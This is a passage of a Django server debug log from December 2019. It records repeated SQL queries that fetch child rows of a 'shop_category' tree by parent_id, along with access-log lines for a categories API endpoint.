"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:47:20,445 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:47:20,449 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:47:20,454 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:47:20,458 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:47:20,463 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:47:20,468 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:47:20,473 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:47:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:52:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:53:00,881 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:53:00,891 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:53:00,896 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:53:00,899 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:53:00,904 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:53:00,906 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:53:00,910 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:53:00,914 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:53:00,919 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:53:00,925 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:53:00,928 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:53:00,933 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:53:00,937 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:53:00,941 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:53:00,947 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:53:00,950 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:53:00,954 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:53:00,958 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:53:00,962 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:53:00,969 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:53:00,973 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:53:00,977 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:53:00,981 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:53:00,985 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:53:00,990 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:53:00,996 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:53:01,000 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:53:01,004 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:53:01,008 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:53:01,013 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:53:01,019 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:53:01,023 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:53:01,027 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:53:01,032 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:53:01,037 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:53:01,043 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:53:01,047 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:53:01,051 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:53:01,056 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:53:01,059 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:53:01,064 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:53:01,069 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:53:01,073 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:53:01,078 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:53:01,083 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:53:01,087 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:53:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 11:56:02,311 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:56:02,324 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:56:02,328 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:56:02,331 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:56:02,334 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:56:02,337 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:56:02,339 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:56:02,342 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:56:02,344 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:56:02,347 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:56:02,350 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:56:02,352 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:56:02,354 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:56:02,357 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 